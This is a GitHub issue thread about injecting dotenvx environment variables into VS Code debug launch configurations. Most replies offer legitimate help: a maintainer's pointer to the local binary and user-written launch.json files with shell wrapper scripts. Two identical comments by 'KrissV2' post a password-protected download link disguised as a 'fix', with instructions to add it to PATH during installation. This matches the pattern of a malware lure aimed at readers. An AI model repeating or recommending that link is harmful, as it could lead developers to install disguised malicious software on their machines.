### ISSUE TITLE
How to inject dotenvx env variables for vscode debug(launch configuration)

### ISSUE THREAD

**Issue by charlie0077** [dotenvx/dotenvx#364]
I am using vscode. 
This is my launch configuration:

 {
      "name": "Launch Dev",
      "type": "node",
      "request": "launch",
      "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/tsx",
      "outputCapture": "std",
      "skipFiles": ["<node_internals>/**"],
      "program": "${file}",
      "console": "integratedTerminal",
      "env": {
        "STAGE": "Dev"
      }
    },

I use this to debug one file frequently. 

Anyone has an idea on how to inject dotenvx when launch vscode debug?

the "dotenvx run -- npm run dev" is not what i need because i am debugging a single file. not the whole server app.

**Comment by charlie0077** [comment]
I could add this in the file:

import dotenv from '@dotenvx/dotenvx'
// @ts-ignore:next-line
dotenv.config()

But there are problems:
1. i have to add this to many random files, a bit annoying. 
2. dotenvx does not support languages other than node/javascript

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by motdotla** [comment]
`dotenvx` should be available under `${workspaceRoot}/node_modules/.bin` just like your tsx is.

```
${workspaceRoot}/node_modules/.bin/dotenvx
```

**Comment by charlie0077** [comment]
Vscode does not like that, getting error:

Looks like vscode only take one executable instead of a command line. 

Can't find Node.js binary "/Users/me/work/xxx/node_modules/.bin/dotenvx run -- /Users/me/work/xxx/node_modules/.bin/tsx": path does not exist. Make sure Node.js is installed and in your PATH, or set the "runtimeExecutable" in your launch.json

**Comment by benjaminbauer** [comment]
I ran into the same issue with python. Just create a script, that wraps your binary with dotenvx and point the launch config to it. Bonus: accepts other .env files.

```json
...
    {
      "python": "/pathtoscript/dotenvx-injected-python.sh",
      "pythonArgs": [
        "--env-file",
        ".env",
        "--env-file",
        ".env.dev"
      ],
...
```
```sh
#!/bin/sh

# Initialize an empty string to hold the -f options for dotenvx
ENV_FILES=""

# Loop through all the arguments
while [ "$1" != "" ]; do
    case $1 in
        --env-file )              shift
                              ENV_FILES="$ENV_FILES -f $1"
                              ;;
        * )                   break
                              ;;
    esac
    shift
done

# Execute the dotenvx with the collected -f options and the python command with its arguments
/pathtodotenvx/dotenvx run $ENV_FILES -- /pathtovenv/.venv/bin/python "$@"

```

**Comment by spookyuser** [comment]
Thanks for the idea @benjaminbauer 

Here's mine for nextjs specifically, works great!

launch.json
```json
{
  "version": "0.2.0",
  "configurations": [
    {
      "name": "Next.js with dotenvx",
      "type": "node",
      "request": "launch",
      "runtimeExecutable": "${workspaceFolder}/launch.sh",
      "args": ["--env-file", "../../.env"],
      "skipFiles": ["<node_internals>/**"],
      "serverReadyAction": {
        "killOnServerStop": true,
        "pattern": "- Local:.+(https?://.+)",
        "uriFormat": "%s",
        "webRoot": "${workspaceFolder}"
      }
    }
  ]
}
```

launch.sh
```sh
#!/bin/sh

# Initialize an empty string to hold the -f options for dotenvx
ENV_FILES=""

# Loop through all the arguments
while [ "$1" != "" ]; do
    case $1 in
        --env-file | -f )              shift
                              ENV_FILES="$ENV_FILES -f $1"
                              ;;
        * )                   break
                              ;;
    esac
    shift
done

# Execute the dotenvx with the collected -f options and the python command with its arguments
pnpx @dotenvx/dotenvx run $ENV_FILES -- node_modules/.bin/next "$@"
```
